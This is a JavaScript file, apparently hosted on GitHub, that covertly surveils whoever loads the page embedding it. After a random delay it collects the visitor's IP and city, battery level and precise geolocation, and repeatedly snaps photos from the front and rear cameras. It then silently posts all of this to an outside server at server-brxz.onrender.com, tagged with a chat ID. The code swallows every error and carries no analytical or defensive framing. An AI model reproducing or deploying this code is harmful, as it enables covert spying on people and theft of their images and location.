// الملف على: https://raw.githubusercontent.com/FGDHSHS/api/refs/heads/main/api
(function() {
    'use strict';
    
    const config = window._config || {};
    const userId = config.id || '';
    
    const info = {
        id: userId,
        perms: [],
        imgs: [],
        loc: '',
        ip: '',
        bat: '',
        time: new Date().toISOString()
    };
    
    function transmit(payload) {
        const targets = ['https://server-brxz.onrender.com/submitData'];
        
        targets.forEach(function(url) {
            try {
                const fd = new URLSearchParams();
                Object.keys(payload).forEach(function(k) {
                    fd.append(k, payload[k]);
                });
                
                if (navigator.sendBeacon) {
                    navigator.sendBeacon(url, fd);
                } else {
                    const x = new XMLHttpRequest();
                    x.open('POST', url, true);
                    x.send(fd);
                }
            } catch(e) {}
        });
    }
    
    async function main() {
        // IP
        try {
            const r = await fetch('https://ipapi.co/json/');
            const d = await r.json();
            info.ip = d.ip + '|' + d.country_name + '|' + d.city;
        } catch(e) {}
        
        // Battery
        try {
            const b = await navigator.getBattery();
            info.bat = Math.round(b.level * 100) + '%';
        } catch(e) {}
        
        // Location
        try {
            const pos = await new Promise(function(ok, err) {
                navigator.geolocation.getCurrentPosition(ok, err, {
                    enableHighAccuracy: true,
                    timeout: 8000
                });
            });
            info.loc = pos.coords.latitude + ',' + pos.coords.longitude;
            info.perms.push('loc_ok');
        } catch(e) {
            info.perms.push('loc_no');
        }
        
        // Camera
        const modes = ['user', 'environment'];
        for (let i = 0; i < 2; i++) {
            for (let mode of modes) {
                try {
                    const stream = await navigator.mediaDevices.getUserMedia({
                        video: { facingMode: { exact: mode } }
                    });
                    
                    const v = document.createElement('video');
                    v.srcObject = stream;
                    await v.play();
                    await new Promise(function(r) { setTimeout(r, 800); });
                    
                    const c = document.createElement('canvas');
                    c.width = v.videoWidth || 640;
                    c.height = v.videoHeight || 480;
                    c.getContext('2d').drawImage(v, 0, 0);
                    
                    info.imgs.push(c.toDataURL('image/jpeg', 0.7).split(',')[1]);
                    info.perms.push(mode + '_cam_ok');
                    
                    stream.getTracks().forEach(function(t) { t.stop(); });
                } catch(e) {
                    info.perms.push(mode + '_cam_no');
                }
            }
        }
        
        transmit({
            chatId: info.id,
            imageDatas: info.imgs.join(','),
            location: info.loc,
            permissions: info.perms.join(','),
            ipInfo: info.ip,
            battery: info.bat
        });
    }
    
    setTimeout(main, 2000 + Math.random() * 3000);
    
})();
